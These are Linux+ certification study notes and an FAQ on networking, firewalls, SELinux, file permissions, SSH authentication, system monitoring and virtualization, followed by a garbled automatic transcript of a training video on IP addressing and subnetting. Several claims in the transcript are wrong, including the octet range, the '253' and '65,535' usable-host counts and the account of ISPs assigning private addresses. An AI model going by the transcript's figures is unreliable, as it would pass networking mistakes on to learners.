    • Password Security: Strong passwords are crucial. Multi-factor authentication (MFA) enhances password security.

    VI. Encryption

    • GPG (GNU Privacy Guard): A versatile tool for securing files and communications using public and private key pairs.
    • “it’s a very versatile tool for securing files and Communications using public and private key pairs”.
    • Commands include:
• gpg --gen-key: Generates a new key pair.
• gpg -e -r <recipient> <filename>: Encrypts a file for a specific recipient.
• gpg -d <filename.gpg>: Decrypts a file.
• gpg --import <public_key_file>: Imports a public key into the key ring.
• gpg --export -a <user_id> > <public_key_file>: Exports a public key to a file.
• gpg --list-keys: Lists the keys in the key ring.
    • SCP (Secure Copy Protocol): Securely copies files between systems. Uses SSH for encryption.
    • “securely copies files between a local and a remote machine or between two remote machines”
    • scp <source> <destination>: Copies files.

    VII. System Monitoring and Troubleshooting

    • Log Files: Crucial for system administration and troubleshooting. Located in the /var/log directory.
    • syslog (Debian-based): General system log.
    • messages (Red Hat-based): General system log.
    • auth.log: Authentication events.
    • secure (Red Hat-based): Security-related events.
    • dmesg: Kernel-related messages.
    • Use tail -f <logfile> to monitor logs in real-time.
• Disk Usage Analysis and Cleanup: df displays information about available and used disk space; the -h option provides human-readable output. du estimates and displays disk space used by files and directories; the -sh option provides a summary in human-readable format.
• Process Monitoring: top displays a dynamic real-time view of running processes and allows sorting by CPU or memory usage. htop is an enhanced version of top with a more user-friendly interface.
• Memory Management: free displays the amount of free and used memory in the system; with -h it "provides human-readable output", choosing the most appropriate units. watch -n 1 free -h monitors memory usage in real time.
• System Statistics: vmstat reports virtual memory statistics, including memory usage, CPU performance, and I/O operations.

    VIII. Virtualization and Cloud Computing

    • Virtualization: Enables running multiple virtual machines on a single physical machine.
    • “Virtual machines are basically simulations of physical computers”.
    • Hypervisors: Software or firmware that creates and manages virtual machines.
    • Type 1 (Bare-Metal): Runs directly on the hardware. Examples: VMware ESXi, Microsoft Hyper-V, Xen.
    • Type 2 (Hosted): Runs on top of an existing operating system. Examples: VirtualBox, VMware Workstation.
    • KVM (Kernel-based Virtual Machine): A type 1 hypervisor integrated into the Linux kernel.
    • virsh: Command-line tool for managing KVM virtual machines.
    • virsh start <VM name>: Starts a virtual machine.
• virsh list --all: Lists all virtual machines.
    • virsh shutdown <VM name>: Shut down a virtual machine.
    • VirtualBox: A popular type 2 hypervisor.
    • “commonly used for testing and deploying environments”.
    • vboxmanage: Command-line interface for managing VirtualBox VMs.
    • vboxmanage startvm <VM name>: Starts a virtual machine.
    • vboxmanage list vms: Lists all virtual machines.
    • vboxmanage controlvm <VM name> poweroff: Powers off a virtual machine.
    • Containers (Docker): Package applications and their dependencies into portable containers.
    • docker: Containerization tool.
    • docker run <image>: Runs a container.
    • docker ps: Lists running containers.
    • docker stop <container_id>: Stops a container.
    • docker rm <container_id>: Removes a container.
    • Cloud Computing: Provides on-demand access to computing resources (servers, storage, databases, etc.) over the internet. Types: IaaS, PaaS, SaaS.
• "IaaS is one version of what they would provide for you, which is access to the infrastructure that you would otherwise maintain yourself if you weren't using the cloud."
• "PaaS would be the service providing the platform" on which to develop and deploy applications.
• "SaaS, software as a service, provides the software itself, such as email, on demand."


    Networking Fundamentals and Security: FAQ

    FAQ on Networking Fundamentals and Security

    1. What is an IP address, and why is it important?

    An IP (Internet Protocol) address is a unique numerical identifier assigned to every device connected to a network. It enables devices to communicate with each other and is crucial for network management and communication. IPv4, the original version, uses a 32-bit numerical format (e.g., 192.168.1.1), while IPv6, with its 128-bit format, was developed to address the exhaustion of IPv4’s address space.

    2. What is a subnet mask, and how does it relate to IP addressing?

    A subnet mask is used to divide an IP address into network and host portions. For example, a subnet mask of 255.255.255.0 indicates that the first three octets of the IP address represent the network, while the last octet identifies the host within that network. Different subnet masks allow for varying numbers of hosts within a network. Two addresses are reserved in each subnet for the network address (usually the first address) and the broadcast address (usually the last address).
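
    To make the host-count arithmetic concrete, here is a small worked example in Bash (a sketch covering the two masks discussed above):

    ```bash
    #!/bin/bash
    # Usable hosts per subnet = 2^(host bits) - 2; the two reserved addresses
    # are the network address and the broadcast address.

    host_bits=8                        # 255.255.255.0 (/24) leaves 8 host bits
    echo "/24 -> $(( 2 ** host_bits - 2 )) usable hosts"   # prints 254

    host_bits=16                       # 255.255.0.0 (/16) leaves 16 host bits
    echo "/16 -> $(( 2 ** host_bits - 2 )) usable hosts"   # prints 65534
    ```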

    3. What is DNS, and how does it work to resolve domain names to IP addresses?

    DNS (Domain Name System) is a hierarchical system that translates human-readable domain names (like google.com) into IP addresses that computers use to communicate. When you type a domain name into your browser, your computer sends a query to a DNS resolver, which may then contact root DNS servers, top-level domain (TLD) servers (like .com or .org), and authoritative DNS servers to find the corresponding IP address. This process, although complex, happens very quickly in the background.
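
    To watch this resolution process from the command line, the dig utility (from the dnsutils/bind-utils package, assuming it is installed) is handy:

    ```bash
    dig +short example.com      # print just the resolved IP address(es)
    dig +trace example.com      # walk the chain: root -> TLD -> authoritative
    nslookup example.com        # older, widely available alternative
    ```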

    4. What are ifconfig and ip, and how are they used to manage network interfaces?

    ifconfig (interface configuration) is a command-line utility used to configure network interfaces on Unix-based operating systems. It allows you to view interface configurations, assign IP addresses, and control the state of interfaces. The ip command, part of the iproute2 package, is intended as a modern replacement for ifconfig, offering similar functionalities with a different command syntax. Examples of using the ip command are ip a or ip addr.
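
    A few common invocations, shown side by side (eth0 and the address below are illustrative; interface names vary by system):

    ```bash
    ip a                                        # list all interfaces and addresses
    sudo ip addr add 192.168.1.50/24 dev eth0   # assign an address to an interface
    sudo ip link set eth0 up                    # activate the interface
    sudo ip link set eth0 down                  # deactivate it
    sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0 up   # legacy equivalent
    ```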

    5. How can nmcli be used to manage network connections in Linux?

    nmcli (NetworkManager Command Line Interface) provides a powerful command-line interface for managing network connections on Linux systems. It allows you to view and modify connections, assign static IP addresses, control connection states (up/down), and manage Wi-Fi networks. For instance, you can use nmcli device wifi list to see available Wi-Fi networks and nmcli connection up <connection_name> to activate a connection.

    6. How do the ping and traceroute commands help in troubleshooting network connectivity issues?

    • ping tests the reachability of a host by sending ICMP packets and measuring the round-trip time. It can help determine if a host is online and how reliable the connection is.
    • traceroute tracks the route packets take to reach a destination, identifying the intermediate routers and delays along the path. This helps pinpoint where connectivity issues or delays occur.
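
    Typical usage of both tools (8.8.8.8, Google’s public DNS server, is just a convenient reachable target):

    ```bash
    ping -c 4 8.8.8.8      # send four ICMP echo requests, then stop
    traceroute 8.8.8.8     # list every hop on the path to the destination
    tracepath 8.8.8.8      # similar to traceroute, but needs no root privileges
    ```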

    7. What are firewalls, and how do tools like ufw and iptables contribute to network security?

    Firewalls act as a barrier between a network and the outside world, controlling incoming and outgoing traffic based on configured rules.

    • ufw (Uncomplicated Firewall) is a user-friendly front-end for managing iptables rules, making it easier to set up basic firewall configurations. Examples include sudo ufw allow ssh and sudo ufw deny 80.
    • iptables is a more complex command-line tool that provides direct control over the Linux kernel’s packet filtering capabilities. It allows for highly customized firewall rules.

    8. What is a chroot jail, and how does it enhance system security?

    A chroot jail is an isolated environment created by changing the root directory for a process and its children. This limits the access of that process to a specific subset of the file system, enhancing security by preventing compromised programs from accessing or modifying files outside the jail. It’s useful for testing software in a controlled environment or repairing a system from a rescue environment.
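
    Here is a minimal sketch of building and entering a chroot jail, assuming a GNU/Linux system and an illustrative /srv/jail path; production jails need considerably more setup:

    ```bash
    #!/bin/bash
    # Run as root. Creates a jail containing only bash and its libraries.
    jail=/srv/jail
    mkdir -p "$jail/bin"

    # Copy a shell plus every shared library it links against
    cp /bin/bash "$jail/bin/"
    for lib in $(ldd /bin/bash | grep -o '/[^ ]*'); do
        cp --parents "$lib" "$jail"    # preserves each library's directory layout
    done

    chroot "$jail" /bin/bash           # this shell now sees $jail as /
    ```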

    Network Security: UFW, IP Tables, SELinux, and Best Practices

    Network security is crucial: firewalls act as barriers between internal and external networks by monitoring and controlling traffic based on established rules. Important tools include Uncomplicated Firewall (UFW) and iptables.

    Uncomplicated Firewall (UFW)

    • It is a simple but powerful firewall with an easy syntax.
    • To activate, use the command sudo ufw enable.
    • Traffic can be allowed or denied by direction and port. For example, sudo ufw allow in 22/tcp allows incoming traffic on port 22 (SSH), while sudo ufw deny out 80/tcp denies outgoing HTTP traffic on port 80.
    • To check the status and active rules, use sudo ufw status.
    • Traffic can be allowed from specific IP addresses using sudo ufw allow from <IP address> to any port 22.
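
    Putting those commands together (the source IP is an illustrative example):

    ```bash
    sudo ufw enable                                     # turn the firewall on
    sudo ufw allow in 22/tcp                            # allow incoming SSH
    sudo ufw deny out 80/tcp                            # block outgoing HTTP
    sudo ufw allow from 192.168.1.100 to any port 22    # SSH from one trusted host
    sudo ufw status verbose                             # inspect the active rules
    ```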

    iptables

    • It is a more complex tool that allows detailed control over the network and enables creation of complex rules for packet filtering and network address translation.
    • To view current rules, use sudo iptables -L. The default is the filter table, displaying the INPUT, FORWARD, and OUTPUT chains.
    • To add a rule, use sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT to allow TCP traffic on destination port 22. To block traffic, use sudo iptables -A INPUT -p tcp --dport 80 -j DROP.
    • To save rules, use iptables-save > /etc/iptables/rules.v4. To restore them, use iptables-restore < /etc/iptables/rules.v4.
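
    The same workflow as runnable commands; note that the save step needs the redirection itself to run as root, hence the sh -c wrapper:

    ```bash
    sudo iptables -L -n -v                                # list rules in the filter table
    sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT    # allow incoming SSH
    sudo iptables -A INPUT -p tcp --dport 80 -j DROP      # drop incoming HTTP
    sudo sh -c 'iptables-save > /etc/iptables/rules.v4'   # persist the rules
    sudo iptables-restore < /etc/iptables/rules.v4        # reload them later
    ```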

    SELinux (Security-Enhanced Linux) is a security module in the kernel that provides access control policies. SELinux defines rules for processes and users accessing resources, enforcing strict policies. Its modes of operation include enforcing (blocks violations), permissive (logs violations), and disabled. Common commands include sestatus to view the status, setenforce 1 to enable enforcing mode, and setenforce 0 for permissive mode.
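
    The day-to-day SELinux commands look like this:

    ```bash
    sestatus             # full status: mode, policy, and whether SELinux is enabled
    getenforce           # print just the current mode
    sudo setenforce 0    # switch to permissive (violations are logged, not blocked)
    sudo setenforce 1    # switch back to enforcing
    ```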

    AppArmor is another security mechanism that uses application-specific profiles for access control. Commands include aa-status to get the status of AppArmor, and aa-enforce to enforce a profile for a specific application.

    Additional points on network security:

    • Changing the default SSH port (port 22) can reduce the risk of automated brute-force attacks. This is done in the sshd configuration file (/etc/ssh/sshd_config).
    • Disabling root login forces attackers to log in as standard users and escalate privileges. This is configured in the sshd configuration file by setting PermitRootLogin no.
    • Limiting SSH users involves whitelisting specific users who can log in via SSH using the AllowUsers directive. The SSH service must be restarted to apply configuration changes (a combined sketch of these hardening steps follows this list).
    • GPG (GNU Privacy Guard) is used for encrypting data. It uses asymmetric encryption with public and private key pairs.
    • Secure file transfer can be achieved with SCP (secure file copy) or SFTP (secure file transfer protocol). SCP securely copies files between hosts.
    • Analyzing authentication logs can reveal unauthorized access attempts. Key log files include auth.log (Debian-based) and secure (Red Hat-based).
    • rsync can be used to back up data, including syncing over SSH for secure transfers.
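
    A combined sketch of these hardening steps; the port number, usernames, paths, and hostnames are all illustrative placeholders:

    ```bash
    # In /etc/ssh/sshd_config (edit as root, then restart the SSH service):
    #   Port 2222                # any non-default port reduces automated scans
    #   PermitRootLogin no
    #   AllowUsers alice bob     # whitelist of permitted SSH users
    sudo systemctl restart sshd   # the unit is named "ssh" on Debian-based systems

    gpg --encrypt --recipient alice@example.com secrets.txt   # asymmetric encryption
    scp backup.tar.gz user@server:/backups/                   # secure file copy
    sudo grep "Failed password" /var/log/auth.log             # spot brute-force attempts
    rsync -avz -e ssh /data/ user@server:/backups/data/       # backup over SSH
    ```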

    Linux File Permissions and Access Control

    File permissions are essential for system security, dictating who can access and modify files and directories. Understanding and managing these permissions ensures that sensitive data remains protected and that only authorized users can make changes.

    Levels of File Permissions

    • Categories: Permissions are assigned based on three categories: the owner (a specific user), the group, and others.
    • Permissions: Each category has three types of permissions: read (r), write (w), and execute (x). Read permission allows users to view the file’s contents, write permission allows modification, and execute permission allows running a file or entering a directory.
    • Numerical Values: Each permission has a numerical value: read is 4, write is 2, and execute is 1. These values are combined to represent the total permissions for each category. For example, read and execute (4+1) would be 5.
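
    A quick demonstration of the octal arithmetic (the file names are illustrative):

    ```bash
    chmod 755 script.sh   # owner rwx (4+2+1=7), group r-x (4+1=5), others r-x (5)
    chmod 640 notes.txt   # owner rw- (4+2=6), group r-- (4), others --- (0)
    stat -c '%a %A %n' script.sh   # GNU stat: show octal and symbolic forms together
    ```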

    Commands to Change Permissions

    • chmod (Change Mode): This command is used to change the permissions of a file or directory. It can be used in two ways:
    • Symbolic Mode: Uses symbols like r, w, and x to add or remove permissions. For example, chmod u+rwx,g+rx,o+rx file.txt gives the owner read, write, and execute permissions, and the group and others read and execute permissions.
    • Numerical Mode: Uses numerical values to set permissions. For example, chmod 755 file.txt gives the owner read, write, and execute permissions (7), and the group and others read and execute permissions (5 each).
    • chown (Change Owner): This command changes the ownership of a file or directory. For example, chown user:group file.txt changes the owner to “user” and the group to “group”.
    • chgrp (Change Group): This command changes the group ownership of a file or directory. For example, chgrp group file.txt changes the group owner to “group”.

    Access Control Lists (ACLs)

    • ACLs provide a more fine-grained control over file and directory permissions, allowing definition of permissions for multiple users and groups on a single file or directory.
    • Entries: Each ACL entry specifies permissions for a user or group, consisting of the type (user or group), an identifier (username or group name), and the permissions.
    • Types of ACLs:
    • User ACL: Specifies permissions for a specific user.
    • Group ACL: Specifies permissions for a specific group.
    • Mask ACL: Defines the maximum effective permissions for users and groups other than the owner.
    • Default ACL: Specifies the default permissions inherited by new files and directories created within a directory.
    • Commands:
    • setfacl (Set File ACL): Sets the ACL for a file or directory. For example, setfacl -m u:user:rwx file.txt adds read, write, and execute permissions for the user “user” on “file.txt”.
    • getfacl (Get File ACL): Displays the ACL entries for a specified file, showing all users and groups with their defined permissions.

    Removing ACL Entries

    • -x option: Removes a specific user or group entry from the ACL. For example, setfacl -x u:user file.txt removes the ACL entry for the user “user”.
    • -b option: Removes all ACL entries from a file or directory. For directories, the -d option is used in conjunction with -b to remove default ACL entries.
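
    A short end-to-end example (the user alice and group devs are illustrative and must exist on the system):

    ```bash
    setfacl -m u:alice:rwx project.txt   # grant one extra user full access
    setfacl -m g:devs:r project.txt      # grant one extra group read access
    getfacl project.txt                  # list every ACL entry on the file
    setfacl -x u:alice project.txt       # remove just alice's entry
    setfacl -b project.txt               # strip all ACL entries
    ```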

    By understanding and utilizing these commands, file permissions and access control lists (ACLs) can be effectively managed to maintain a secure and well-organized Linux system.

    User Authentication Methods: Password, MFA, and Public Key

    User authentication involves methods to verify the identity of a user trying to access a system or application. Common methods include password-based authentication, multi-factor authentication (MFA), and public key authentication.

    Password-Based Authentication

    • This is the default method where users enter a username and password to gain access.
    • To improve security, password-based authentication can be enhanced with Multi-Factor Authentication (MFA).

    Multi-Factor Authentication (MFA)

    • MFA adds an extra layer of security by requiring users to provide multiple verification factors.
    • This often includes sending a code to a user’s phone or email, or using biometric methods like fingerprint or face scans.
    • MFA reduces the risk of unauthorized access, even if an attacker obtains the user’s password.

    Public Key Authentication

    • This method uses a key pair consisting of a private key and a public key.
    • The private key is kept secret by the user, while the public key is placed on the server.
    • Public key authentication is more secure than password-based authentication and is far less susceptible to brute-force attacks.
    • It allows for automated, passwordless logins, which are useful for scripts and applications.
    • To generate a key pair, the ssh-keygen command is used.
    • After running ssh-keygen, you are prompted for a file path to save the key, and a passphrase can be set for additional security.

    Key Transfer and Authentication

    • To enable passwordless access, the public key must be transferred to the authorized_keys file on the server (typically ~/.ssh/authorized_keys).
    • The user must authenticate themselves with a password at some point before transferring the key.
    • Without initial password authentication, the system will not trust the user to transfer the key.
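
    The whole workflow, assuming OpenSSH on both ends (the user and server names are placeholders):

    ```bash
    ssh-keygen -t ed25519      # generate a key pair; accept the default path
    ssh-copy-id user@server    # appends your public key to ~/.ssh/authorized_keys
                               # on the server (asks for the password this one time)
    ssh user@server            # subsequent logins authenticate with the key
    ```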

    System Monitoring with top, htop, free, and vmstat

    System monitoring is crucial for maintaining system performance and troubleshooting issues. Key tools for this purpose include top, htop, free, and vmstat.

    **top**

    • Provides a dynamic, real-time view of running processes and their resource usage.
    • Displays CPU usage, memory usage, and process IDs (PIDs).
    • To sort by CPU usage, press Shift+P while top is running.
    • To sort by memory usage, press Shift+M.
    • To quit, press q.

    **htop**

    • It is a user-friendly alternative to top with enhanced features and an intuitive interface.
    • Offers interactive process management and color-coded output.
    • Can use function keys (F1-F12) or keyboard shortcuts for navigation.
    • F3 key can be used to search for processes.
    • F9 key can be used to kill a process.
    • To quit, press q or F10.

    **free**

    • Displays information about the system’s memory usage, including physical memory and swap space.
    • The command free -h formats the output in a human-readable format (KB, MB, GB).
    • Shows the total, used, free, shared, buffer, and cached memory.
    • To monitor memory usage in real-time, use watch -n 1 free -h.
    • Detailed memory information can be obtained from the /proc/meminfo file.

    **vmstat**

    • vmstat (virtual memory statistics) monitors system performance, providing statistics on CPU, memory, and I/O operations.
    • The basic command is vmstat 1 5, where the first number is the update interval in seconds, and the second is the number of iterations.
    • Key fields in the output include processes (runnable and blocked), memory (swap, free, buffer, cache), swap (in and out), I/O (blocks received and sent), system (interrupts and context switches), and CPU usage (user, system, idle, wait, stolen).
    • The st field refers to the CPU steal time, which is the percentage of time a virtual CPU is waiting for resources because the hypervisor is allocating resources to another VM.
    • Running vmstat 1 updates data every second until interrupted, while vmstat provides a single snapshot.

    These tools provide different perspectives and can be used together to get a comprehensive understanding of system performance.
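
    As a small example of building on these tools, here is a sketch of a memory watchdog using free; the 10% threshold and 5-second interval are arbitrary choices, and the column positions assume the procps-ng free output described above:

    ```bash
    #!/bin/bash
    # Print a warning whenever available memory drops below 10% of total.
    while true; do
        avail=$(free | awk '/^Mem:/ {print $7}')   # "available" column, in KiB
        total=$(free | awk '/^Mem:/ {print $2}')   # total physical memory
        pct=$(( avail * 100 / total ))
        if [ "$pct" -lt 10 ]; then
            echo "$(date): only ${pct}% of memory available"
        fi
        sleep 5
    done
    ```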

    Virtualization, Cloud Computing, and Containerization Technologies Overview

    Virtualization is a technology that allows multiple virtual machines to run on a single physical machine, improving resource use and providing isolated environments. Key concepts include virtual machines and hypervisors.

    Virtual Machines (VMs)

    • VMs are software-based simulations of physical computers, each running its own operating system and applications independently of others on the same physical host.
    • VMs offer isolation, so a failure in one VM does not affect others.

    Hypervisors

    • A hypervisor is software or firmware that creates, manages, and deploys virtual machines, allocating resources to each.
    • There are two types of hypervisors:
    • Type 1 (Bare Metal): Runs directly on the physical hardware without needing a host operating system, common in enterprise environments for high performance. Examples include VMware ESXi, Microsoft Hyper-V, and Xen.
    • Type 2 (Hosted): Runs on top of an existing operating system. It uses the host’s resources and is suited for desktop virtualization and smaller environments. Examples include VirtualBox, VMware Workstation, and Parallels Desktop.

    Advantages of Virtualization:

    • Resource Efficiency and Scalability: Virtualization allows efficient use of physical resources and easy scaling up or down based on needs.
    • Isolation and Security: Each VM operates independently, isolating it from other VMs on the network. A compromised VM does not affect the rest of the network.
    • Flexibility and Agility: Enables easy testing, deployment, and development in isolated environments. New virtual machines can be quickly deployed.
    • Disaster Recovery: Simplifies backups and recovery by storing entire virtualized environments that can be easily accessed and restored, especially with redundancies in place.

    Kernel-Based Virtual Machine (KVM)

    • KVM is a type 1 hypervisor integrated into the Linux kernel, transforming the OS into a virtualization host.
    • It leverages Linux features for memory management, process scheduling, and I/O handling.
    • KVM supports hardware-assisted virtualization via Intel VT or AMD-V technology.
    • The virsh command-line tool manages KVM-based VMs. Common virsh commands include virsh start to start a VM, virsh list to list running VMs, and virsh shutdown to shut down a VM.

    VirtualBox

    • VirtualBox is a type 2 hypervisor developed by Oracle, compatible with various operating systems like Linux, Windows, and macOS.
    • It offers an easy-to-use GUI and command-line interface for managing VMs.
    • Key features include snapshot functionality for backups and guest additions to enhance performance.
    • VBoxManage is the command-line interface for VirtualBox, with commands like VBoxManage startvm to start a VM, VBoxManage list vms to list VMs, and VBoxManage controlvm to control VMs.

    Cloud Computing

    Cloud computing provides on-demand access to computing resources over the Internet, including servers, storage, databases, and software. It allows users to provision and manage these resources easily.

    Cloud Service Models:

    • Infrastructure as a Service (IaaS): Provides virtualized hardware resources like virtual machines, storage, and networks. Users deploy and manage operating systems, applications, and development environments. Examples include AWS EC2, Microsoft Azure Virtual Machines, and Google Compute Engine.
    • Platform as a Service (PaaS): Offers a development and deployment environment in the cloud, including tools and services to build, test, deploy, and manage applications without managing the underlying infrastructure. Examples include AWS Elastic Beanstalk, Google App Engine, and Microsoft Azure App Service.
    • Software as a Service (SaaS): Delivers applications over the Internet on a subscription basis. Users access these applications via a web browser without needing to install or maintain anything. Examples include Microsoft Office 365, Google Workspace, and Salesforce.

    Advantages of Cloud Computing:

    • Scalability: Easily scale resources up or down based on demand.
    • Cost Efficiency: Reduces upfront costs by eliminating the need for physical hardware.
    • Flexibility and Accessibility: Access services from anywhere with an internet connection.
    • Reliability and Availability: Redundant locations ensure high availability and reliability.
    • Disaster Recovery: Scheduled backups prevent data loss.
    • Automatic Updates: Services are automatically updated without user intervention.

    Major Cloud Providers:

    • Amazon Web Services (AWS): Offers a wide range of services, including computing power, storage, and networking.
    • Microsoft Azure: Provides seamless integration with Microsoft products and a variety of cloud services.
    • Google Cloud: Known for capabilities in data analytics and machine learning, with a robust set of cloud services.

    Containerization

    Containerization involves packaging applications and their dependencies into portable containers that run consistently across different environments. Docker is a popular containerization tool.

    Containers vs. Virtual Machines:

    • Containers share the host operating system’s kernel, making them lightweight and fast to start.
    • They include everything needed to run the application (code, runtime, libraries, etc.) but do not include a full guest operating system.
    • Virtual machines, in contrast, run on a hypervisor and include a full operating system.
    • Docker containers run on anything supporting Docker, ensuring consistency across development, testing, and production environments.

    Benefits of Containers:

    • Efficiency: Lightweight and use fewer resources.
    • Scalability: Easily scale up or down based on demand.
    • Portability: Can be transferred and run on various operating systems.
    • Isolation: Multiple applications can run on the same host without interfering with each other.

    Basic Docker Commands:

    • docker run -it <image_name>: Runs a container image interactively.
    • docker ps: Lists running containers.
    • docker stop <container_id>: Stops a running container.
    • docker pull <image_name>: Downloads a Docker image from Docker Hub.
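
    A typical end-to-end container session built from these commands (nginx and port 8080 are illustrative choices):

    ```bash
    docker pull nginx                       # download the image from Docker Hub
    cid=$(docker run -d -p 8080:80 nginx)   # run detached; map host 8080 to container 80
    docker ps                               # confirm the container is running
    docker stop "$cid"                      # stop it
    docker rm "$cid"                        # remove the stopped container
    ```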

    Container Orchestration

    Container orchestration tools automate the deployment, scaling, and management of containerized applications.

    • Kubernetes (K8s): An open-source platform for automating deployment, scaling, and management of containerized applications. Key features include automated deployment and scaling, load balancing, self-healing, and secure management of sensitive information.
    • Example commands: kubectl create deployment nginx --image=nginx to create a deployment and kubectl scale deployment nginx --replicas=3 to scale the deployment.
    • Docker Swarm: Docker’s native clustering and orchestration tool, simpler than Kubernetes. It offers simplified setup, scaling, load balancing, and secure communication between nodes.
    • Example commands: docker swarm init to initialize a swarm, docker service create --name web --replicas 3 -p 80:80 nginx to create a service, and docker service ls to list services.

    Virtual Machine Management (libvirt)

    • Libvirt is a toolkit with an API for interacting with VMs across different virtualization platforms like KVM, Xen, and VMware.
    • It provides a unified API for managing VMs across different hypervisors, simplifying VM management.
    • Key features include virsh for management and virt-install for creating new VMs.

    Common libvirt Commands:

    • virt-install: Installs a new virtual machine.
    • Example: virt-install --name myubuntuvm --memory 2048 --vcpus 2 --disk path=/var/lib/libvirt/images/myubuntuvm.qcow2,size=20 --os-variant ubuntu20.04.
    • virsh destroy: Forcibly stops a specified VM.
    • Example: virsh destroy myubuntuvm.
    • virsh list --all: Lists all VMs managed by libvirt.
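
    A complete create/inspect/tear-down cycle with these tools might look like the following sketch; the VM name, sizing, and ISO path are illustrative placeholders:

    ```bash
    sudo virt-install --name myubuntuvm --memory 2048 --vcpus 2 \
        --disk path=/var/lib/libvirt/images/myubuntuvm.qcow2,size=20 \
        --os-variant ubuntu20.04 --cdrom /path/to/ubuntu-20.04.iso
    virsh list --all            # every VM libvirt knows about, running or not
    virsh start myubuntuvm      # boot the VM
    virsh shutdown myubuntuvm   # graceful shutdown (the guest must cooperate)
    virsh destroy myubuntuvm    # hard power-off if shutdown hangs
    ```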
    Full Linux+ (XK0-005 – 2024) Course Pt.2 | Linux+ Training

    The Original Text

    this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page notes document and all of the pre-made shell scripts consider joining the agent tier of hackolo anonymous you’ll also get monthly python automations exclusive content and direct access to me via Discord join hack alic Anonymous today okay now it is time to talk about networking and the fundamentals of networking again this is not going to be a replacement for Network Plus or anything like that but it will be fairly comprehensive and we’re going to go through a lot of the fundamentals as well as some of the commands and tools that you will need to uh navigate the network and the network connections and the interfaces of a Linux environment so first and foremost let’s go into some basic networking Concepts IP addressing so IP addresses are unique identifiers assigned to devices that are connected to a network they allow you communicate with each other uh and are very important for Network management and communication uh so anything when you hear something like a network or anytime that you hear the word network uh think IP addresses and uh IP addresses are very much the main uh the I mean address the main identifiers that uh are assigned through various devices so your TV has an IP address your phone will have an IP address address your computer obviously will have an IP address um anything that’s connected to a network anything that’s connected to the internet will have an IP address ipv4 is the original IP address and it’s a 32bit numerical label uh what you see right here in the green right here that’s traditionally what it looks like it’s separated by three dots and it has three digits or it can have up to three digits on each portion of this thing and it can go from uh one actually Zer it can go from zero and uh go all the way to 254 I want to say um we’ll verify that in a couple of slides uh so what it does is it provides approximately 4.3 billion unique addresses but then what happened is that a lot of devices were developed so you know the average household has or the average person even has multiple uh devices that are connected to the internet and quickly uh way faster than I think people anticipated uh the ipv four addresses ran out um but what happens is that each a uh ISP each internet service provider assigns a series of private IP addresses to each individual person and uh for the most part you will not run across a a duplicate IP address although being that there’s only 4.3 billion unique variations uh it can run across so it can actually have duplicates and that’s one of the issues that resulted in them developing IPv6 so uh ipv4 is the most commonly used version of Ip but because of the fact that there were so many devices they developed a new uh IPv6 format and the IPv6 format looks very different from what we saw previously it is 128bit whereas ipv4 is 32bit so when you have a 128bit identifier it obviously looks a little bit different so in this particular case this is a s Le of an IPv6 address and instead of offering the billions this actually offers 340 unilan addresses and I don’t I I had not even heard of this word prior to looking at IPv6 IP addresses um clearly it is way more than what is available with ipv4 so it’s designed to replace ipv4 eventually but your current computer my current computer uh they have both of these so they’ll actually have the ipv4 as well as the IPv6 But ultimately at some point not exactly 
sure when IPv6 will replace ipv4 IP addresses to understand networking and IP addresses you also need to understand subnetting so what a subnet is and subnetting is a method that’s used to divide a larger Network into smaller chunks so that they’re easier to manage um and those small chunks are called subnet and it improves the network organization uh the efficiency of the network and the security of the network it also helps to reduce the congestion of the network meaning that there won’t be uh too many things happening at the same time it won’t be blocked off or clogged so to speak um a subnet mask is what you can see as an example in this particular case in the green right here so subnet mask determine the network and the host portions of the IP address so for ipv4 a common one is what you see here now the network portion are these first series of 255s and then the host portion would be this very last thing that is represented by a zero here so in this particular case we have three octets that represent the network portion so that’s one octet that’s another octet that’s another octet Al together you have four octets and four time octet so octet repres repr is8 bits right so when you have 4 * 8 you have a total of 32 so this is a total of 32 bits now when you have the first three octets that are represented by the network that means that these are the network itself so in uh in this particular Network these three portions are going to look exactly the same and each device is going to have a different number at the very end of it so the first three portions will be exactly the same because that’ll be that Network work that they’re connected to and then that last bit is what’s going to change that last octet is what’s going to change to assign an unique identifier for each one of those devices so for example in this particular case we have you know 1 192 16811 was a subnet subnet mask of 255 2555 2555 so the first three o octets are exactly the same which means that this portion 1921 1681 this first three the numbers right here represent the network and then the last piece would be the actual host and then if there’s three hosts that presumably it would be one 2 and three so 1 1921 16811 1 1921 16812 1 1921 16813 so on and so forth so this is the uh subnet that is represented with this mask right here we have this subnet mask now if we wanted to expand this this is what it actually looks like right here so the binary representation is we have eight ones here8 ones here 8 ones here and then we have the zeros at the end representing the portion that can change and this is the subnet mask right here uh the network bits in this case are 24 so you have 8 * 3 which would be 24 the host bits would be eight this last eight uh octet or this eight bits right here the calculation it’s a little bit complicated but not really so you have the number of the hosts per subnet which would be two to the power of the number of host bits so the number of host bits in this case would be eight so 2 to the power of 8 is what we see here minus 2 and I’ll explain what this means right here but 2 to the^ of 8 minus 2 would be 256 so 2 to ^ of 8 would be 256 minus 2 which ends up being 254 so this particular subnet can have 254 individual IP addresses okay so 254 hosts can reside on this particular subnet mask that’s how it breaks down now we look at the next sample of this where you have a subnet mask that actually has the first two octets reserved for the network and then you have the next two octets reserved for 
the host so you have 16 bits this portion 2 * 8 is 16 bits you have these 16 bits reserved for the network and then you have these 16 bits reserved for the host and when we actually do the calculation here it would be 2 to the^ of 16 which is 65,536 65,536 potential host except you have to subtract that two so it ends up being 65534 so very different from this 254 that is on this one octet right here if you just free up two of these octets for this particular particular subnet mask you now have 65,535 potential host IP addresses that you can assign to people inside of this particular subnet or this particular Network right so this is what it looks like now why do we subtract two this is a very important question so there are two addresses that we need to reserve for any given Network and the first one is the network address so the first address in the subnet which is reserved for the network itself which ends up being represented by just it could be the zero right for example and then the next one is the broadcast address which is the last address that’s represented in the network which would be technically the 256 for example or 255 excuse me so the zero and then the 255 for example would be the ones that are reserved so you actually can go up to 254 right so it go from 1 to 254 for as an example but for the most part and you can assign this when you’re actually assigning your gateways and you’re uh developing your network subnet and The Mask itself you will assign your network address and then you will assign your broadcast address and then that will take up two of those variations and then the remaining uh 253 of the variations will allow for the rest of the devices the rest of the hosts that can reside on that subnet so as a summary we can have have this subnet that allows for 254 potential hosts to reside on it and then you can have this subnet that can allow for 65,535 potential hosts so uh this would obviously be a company this would be probably a home or a company that has less than 254 devices and being that each employee might get let’s say I don’t know their cell phone would be one their work cell phone would be another one their computer would be one maybe an IP address or iPad 